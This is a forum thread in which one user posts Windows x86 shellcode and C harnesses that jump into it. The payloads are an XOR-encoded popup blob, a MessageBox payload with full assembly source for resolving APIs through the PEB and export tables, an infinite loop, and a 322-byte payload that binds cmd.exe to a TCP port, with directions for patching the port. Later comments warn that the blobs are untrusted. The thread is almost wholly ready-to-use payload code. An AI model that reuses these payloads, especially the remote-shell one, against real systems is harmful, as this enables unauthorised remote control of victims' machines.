SHELLCODE测试代码    [ 2007-01-11 1:17:31 AM | Author: kyo327 | From: Original ]
#include<windows.h>
/*
 * Opaque x86 machine code, kept byte-for-byte as posted.  Only the tail is
 * readable: \x68\x61\x70\x70\x79\x20\x66\x6F\x72\x20\x32\x30\x30\x37\x00 is
 * the ASCII string "happy for 2007" followed by a NUL (the author's second
 * copy of this listing writes it as a literal).  The leading bytes
 * (jmp / pop ebx / dec ebx / xor ecx,ecx / mov cl / xor byte ptr / loop)
 * appear to correspond to the XOR-decoding stub sketched in the commented-out
 * source further down, which would mean most of the array is stored encoded
 * rather than as plain code -- NOTE(review): not verified here.  Treat the
 * blob as untrusted code: inspect it statically or in an isolated VM, never
 * on a working host.
 */
char ShellCode[]=
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\x9b\x80\x34\x0b\xfe\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff\x17\x7b\xfe\xfe\xfe\xa1\x9a\x5f\xce\xfe\xfe"
"\xfe\x75\xbe\xf2\x75\x8e\xe2\x53\x75\x96\xf6\x75\x09\x94\xfc\xa7"
"\x16\xdb\xfe\xfe\xfe\x1c\x07\x96\xcd\xcc\xfe\xfe\x96\x8b\x8d\x9b"
"\x8c\xaa\x01\xe8\x75\x16\x94\xff\xa7\x16\xf2\xfe\xfe\xfe\x1c\x07"
"\xaf\xa9\xa9\xaf\x01\xa8\xf6\x01\xa8\xfa\xaf\xa8\x75\x8b\xc2\x75"
"\x8a\xd0\x86\xfd\x0b\xa8\x75\x88\xde\xfd\x0b\xcd\x37\xb7\xbf\x53"
"\xfd\x3b\xcd\x25\xf1\x40\xee\xc4\x28\x8a\xf6\x3f\x35\xf9\xfd\x24"
"\xbe\x15\x0f\xc5\xe1\x8b\x19\xa0\x75\xa0\xda\xfd\x23\x98\x75\xf2"
"\xb5\x75\xa0\xe2\xfd\x23\x75\xfa\x75\xfd\x3b\x55\xa0\xa7\x3d\x16"
"\x88\x01\x01\x01\xcc\x8a\x6f\xf2\x9d\x77\x2f\xb1\x94\xf4\xc6\xe0"
"\x68\x61\x70\x70\x79\x20\x66\x6F\x72\x20\x32\x30\x30\x37\x00";
int main()
{

/*
 * Transfers control into the ShellCode byte array.  &ShellCode is a pointer
 * to the array object; converting an object pointer to a function pointer
 * and calling through it is not defined by ISO C -- it is a compiler
 * extension, presumably one the author's 32-bit Windows toolchain accepted.
 * Whether the call runs at all also depends on the array living in
 * executable memory: with DEP/NX enforced on the data segment the call
 * faults on the first byte.  What the blob does once entered is not visible
 * from this file.
 */
( (void(*)(void)) &ShellCode)();
/* Reached only if the blob returns to its caller. */
return 0;
}


通用的,测试弹一个小窗口!!呵呵!





Quote kyo327 Posted at 2007-01-11 1:24:33 AM
#include<windows.h>
/*
 * Same opaque x86 blob as the first listing, kept byte-for-byte; the only
 * difference is that the trailing "happy for 2007" text is written as a
 * literal instead of hex escapes (the explicit \x00 ends it, and the string
 * literal itself adds one more NUL).  Treat as untrusted code: analyze it
 * statically or in an isolated VM rather than executing it on a host.
 */
char ShellCode[]=
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\x9b\x80\x34\x0b\xfe\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff\x17\x7b\xfe\xfe\xfe\xa1\x9a\x5f\xce\xfe\xfe"
"\xfe\x75\xbe\xf2\x75\x8e\xe2\x53\x75\x96\xf6\x75\x09\x94\xfc\xa7"
"\x16\xdb\xfe\xfe\xfe\x1c\x07\x96\xcd\xcc\xfe\xfe\x96\x8b\x8d\x9b"
"\x8c\xaa\x01\xe8\x75\x16\x94\xff\xa7\x16\xf2\xfe\xfe\xfe\x1c\x07"
"\xaf\xa9\xa9\xaf\x01\xa8\xf6\x01\xa8\xfa\xaf\xa8\x75\x8b\xc2\x75"
"\x8a\xd0\x86\xfd\x0b\xa8\x75\x88\xde\xfd\x0b\xcd\x37\xb7\xbf\x53"
"\xfd\x3b\xcd\x25\xf1\x40\xee\xc4\x28\x8a\xf6\x3f\x35\xf9\xfd\x24"
"\xbe\x15\x0f\xc5\xe1\x8b\x19\xa0\x75\xa0\xda\xfd\x23\x98\x75\xf2"
"\xb5\x75\xa0\xe2\xfd\x23\x75\xfa\x75\xfd\x3b\x55\xa0\xa7\x3d\x16"
"\x88\x01\x01\x01\xcc\x8a\x6f\xf2\x9d\x77\x2f\xb1\x94\xf4\xc6\xe0"
"happy for 2007\x00";
int main()
{

/*
 * MSVC-specific inline assembly (32-bit only: the x64 MSVC compiler does not
 * accept _asm blocks).  lea loads the address of the ShellCode array into
 * eax and call eax jumps into it -- the same control transfer as calling a
 * function pointer cast from the array, just without a C-level cast.  The
 * bytes must sit in executable memory for the call to do anything but fault
 * under DEP/NX.  What the blob does once entered is not visible from this
 * file.
 */
_asm
{
lea eax,ShellCode
call eax
}
/* Reached only if the blob returns to its caller. */
return 0;
}

Quote kyo327 Posted at 2007-01-12 10:58:43 PM
方便用,比较小一点,只有322bytes,LSD那个方法编译出来有500多bytes,呵呵


port 是倒数第四个字节起的2个字节. 这里默认是21端口,\x15\x00


/*
 * 322 bytes.  Quoted as a bare string literal with no declaration and no
 * terminating statement, so this snippet is not compilable as-is; bytes are
 * kept exactly as posted.  The author's note below labels it a port-binding
 * payload for Windows 2000/XP/2003, and the prose above describes where the
 * port value sits.  Readable fragments a static scan would flag: the dword
 * pieces "32" and "ws2_" (\x33\x32\x00\x00, \x77\x73\x32\x5f) and "cmd\0"
 * (\x63\x6d\x64\x00).  Handle as hostile: disassemble offline or run only
 * inside an isolated, instrumented VM.
 */
"\xe9\x10\x01\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x03\x59\xe8\xb0\x00\x00\x00"
"\xe2\xf9\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\xff\x16\x8b"
"\xe8\x6a\x06\x59\xe8\x97\x00\x00\x00\xe2\xf9\x33\xdb\x43\xff\x56"
"\x20\x83\xfb\x64\x75\xf7\x83\xc7\x04\x81\xec\x90\x01\x00\x00\x54"
"\x68\x01\x01\x00\x00\xff\x56\x0c\x50\x50\x50\x50\x6a\x01\x6a\x02"
"\xff\x56\x10\x8b\xd8\x33\xc0\x50\x50\x66\x8b\x56\x24\x86\xd6\xc1"
"\xca\x10\x66\xba\x02\x00\x52\x8b\xd4\x6a\x10\x52\x53\xff\x56\x14"
"\x6a\x01\x53\xff\x56\x18\x50\x50\x53\xff\x56\x1c\x8b\xd8\x68\x63"
"\x6d\x64\x00\x8d\x14\x24\x83\xec\x54\x8b\xfc\x6a\x14\x59\x33\xc0"
"\x89\x04\x8f\xe2\xfb\xc6\x47\x10\x44\xfe\x47\x3c\xfe\x47\x3d\x89"
"\x5f\x48\x89\x5f\x4c\x89\x5f\x50\x8d\x47\x10\x57\x50\x51\x51\x51"
"\x6a\x01\x51\x51\x52\x51\xff\x56\x04\x33\xc0\x48\x50\xff\x56\x08"
"\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b\x76\x20\x03"
"\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10\x3a\xd6\x74"
"\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7\x5e\x8b\x5e"
"\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03"
"\xc5\xab\x5e\x59\xc3\xe8\xeb\xfe\xff\xff\x32\x74\x91\x0c\xc9\xbc"
"\xa6\x6b\x8f\xf2\x18\x61\x3d\x6a\xb4\x80\x2d\x32\x78\xde\x64\x10"
"\xa7\xdd\x0c\x9f\xd3\x4b\xb1\x1e\x97\x01\x7c\xe2\x9b\x7c\x15\x00"
"\xbf\xe5";

Windows 2k/XP/2k3 322 bytes port rebind shellcode

Quote kyo327 Posted at 2008-11-23 5:33:02 AM
#include <stdio.h>

//224 bytes MessageBox() shellcode(NT/2K/XP)
/*
 * Opaque x86 machine code kept byte-for-byte.  The trailing bytes are plain
 * ASCII and line up with the _emit list in the commented-out source below:
 * "LoadLibraryA\0" "user32\0" "MessageBoxA\0" "ExitProcess\0" and finally
 * "OK" (the string-literal initializer supplies the closing NUL).  The
 * leading "" is an empty literal that the following strings concatenate
 * onto.  Treat as untrusted code: analyze statically or in an isolated VM.
 */
unsigned char sh4llcode[] =""

"\xE9\xA7\x00\x00\x00\x5A\x64\xA1\x30\x00\x00\x00\x8B\x40\x0C\x8B"
"\x70\x1C\xAD\x8B\x40\x08\x50\x52\x6A\x0C\xE8\x2F\x00\x00\x00\x5B"
"\x83\xC3\x0D\x53\xFF\xD0\x83\xC3\x07\x53\x6A\x0B\xE8\x1D\x00\x00"
"\x00\x5B\x83\xC3\x18\x6A\x00\x53\x53\x6A\x00\xFF\xD0\xBA\x0C\x00"
"\x00\x00\x58\x2B\xDA\x53\x52\xE8\x02\x00\x00\x00\xFF\xD0\x8B\xD8"
"\x83\xC0\x3C\x8B\x00\x03\xC3\x80\x38\x50\x75\x49\x8B\x40\x78\x03"
"\xC3\x50\x8B\xC8\x8B\x49\x14\x8B\x40\x20\x03\xC3\x55\x8B\xE8\x33"
"\xD2\x51\x8B\x00\x03\xC3\x8B\xF8\x8B\x74\x24\x14\x8B\x4C\x24\x10"
"\xFC\xF3\xA6\x75\x17\x83\xC4\x04\x8B\x44\x24\x04\x8B\x40\x1C\x03"
"\xC3\xC1\xE2\x02\x03\xC2\x8B\x00\x03\xC3\xEB\x0B\x42\x83\xC5\x04"
"\x8B\xC5\x59\xE2\xCC\x33\xC0\x5D\x59\xC2\x04\x00\xE8\x54\xFF\xFF"
"\xFF\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x75\x73"
"\x65\x72\x33\x32\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x41"
"\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00"
"OK"
;


int main()
{

/* Function pointer that is aimed at the sh4llcode byte array below. */
void (*c0de)();
printf("Win32 \"MessageBox() shellcode\"\n");
/*
 * Stores the array address into the function pointer by writing through an
 * int* alias.  This breaks strict aliasing, assigns a pointer to an int
 * without a cast (a constraint violation compilers diagnose), and on any
 * target where pointers are wider than int it writes only the low bytes --
 * it does what the author intends only on a 32-bit build.  Calling data as
 * code is not defined by ISO C and additionally needs the array to live in
 * executable memory; under DEP/NX the call faults instead.
 */
*(int*)&c0de = sh4llcode;
c0de();
/*
 * No return statement: C99 main() implicitly returns 0, but the embedded
 * "ExitProcess" string suggests the blob ends the process itself --
 * NOTE(review): not verified here.
 */

}

//以下是源码
/*

void shellcode()
{

//做标记方便寻找shellcode
__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
}

__asm
{
// --------------------解码----------------------
// jmp decode_end
//decode_start:

// pop ebx; //取回shellcode在内存中的位置
// dec ebx;
// xor ecx,ecx;
// mov cx,0xffff; //shellcode的长度

//decode_loop:
// xor byte ptr [edx+ecx],0x99; //解码
// loop decode_loop;
// jmp decode_ok;

//decode_end:
// call decode_start;

//decode_ok:
// --------------------解码----------------------

jmp end
start:
pop edx; //取回shellcode在内存中的位置
mov eax, fs:0x30
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov eax,[eax+8] //从peb获取kernel32.dll的基址

push eax;
push edx;
push 0xc;
call getaddr; //调用getaddr函数获取LoadLibraryA函数地址.

pop ebx;
add ebx,0xd;
push ebx;
call eax; //调用LoadLibraryA("user32"),加载user32.dll;

add ebx,0x7;
push ebx;
push 0xb;
call getaddr; //调用getaddr函数获取MessageBoxA函数地址.

pop ebx;
add ebx,0x18;
push 0;
push ebx;
push ebx;
push 0;
call eax; //调用MessageBoxA

mov edx,0xc;
pop eax;
sub ebx,edx;
push ebx;
push edx;
call getaddr; //调用getaddr函数获取exitprocess函数地址.
call eax; //调用exitprocess


getaddr:
mov ebx,eax;
add eax,0x3c; //定位e_lfanew字段位置
mov eax,[eax]
add eax,ebx; //定位pe头
cmp [eax],0x00004550
jne NotFound;

mov eax,[eax + 0x78] //文件的定位导出表
add eax,ebx;


push eax;
mov ecx,eax; //ecx指向导出表;
mov ecx,[ecx + 0x14] //找出导出表中函数个数作为循环值

mov eax,[eax + 0x20];
add eax,ebx;

push ebp;
mov ebp,eax; //ebp保存函数指针数组的指针
xor edx,edx; //edx清0用于存放函数索引
FindLoop:
push ecx;
mov eax,[eax];
add eax,ebx;
mov edi,eax

mov esi,[esp + 0x14];
mov ecx,[esp + 0x10];

cld
rep cmpsb
jne FindNext //比较,如果不是,则取下一个函数

add esp,4

mov eax,[esp + 0x4];
mov eax,[eax + 0x1c]
add eax,ebx;

shl edx,2 //函数索引*函数长度(默认为4个字节)
add eax,edx; //函数地址表基址+(函数索引)

mov eax,[eax];
add eax,ebx;

jmp Found
FindNext:
inc edx;

add ebp,4;
mov eax,ebp; //函数指针指向下一个函数

pop ecx;
loop FindLoop
NotFound:
xor eax,eax
Found:
pop ebp;
pop ecx;
ret 4; //本函数有两个参数,这里只平衡了一个4字节的堆栈;


// ================== 结束调用 ====================
end:
call start
_emit 'L';
_emit 'o';
_emit 'a';
_emit 'd';
_emit 'L';
_emit 'i';
_emit 'b';
_emit 'r';
_emit 'a';
_emit 'r';
_emit 'y';
_emit 'A';
_emit 0x00;
_emit 'u';
_emit 's';
_emit 'e';
_emit 'r';
_emit '3';
_emit '2';
_emit 0x00;
_emit 'M';
_emit 'e';
_emit 's';
_emit 's';
_emit 'a';
_emit 'g';
_emit 'e';
_emit 'B';
_emit 'o';
_emit 'x';
_emit 'A';
_emit 0x00;
_emit 'E';
_emit 'x';
_emit 'i';
_emit 't';
_emit 'P';
_emit 'r';
_emit 'o';
_emit 'c';
_emit 'e';
_emit 's';
_emit 's';
_emit 0x00;
_emit 'O';
_emit 'K';
_emit 0x00;



off:
}

__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
}

//return;
}

*/

Quote kyo327 Posted at 2009-03-20 3:07:06 PM
/* EB FE is an x86 short jump whose target is the jump itself (displacement -2 from the byte after it), i.e. a two-byte infinite loop; the trailing "jmp -1" is the author's informal annotation, not C, so the line is not compilable as written. */
char shellcode[] ="\xEB\xFE"; jmp -1

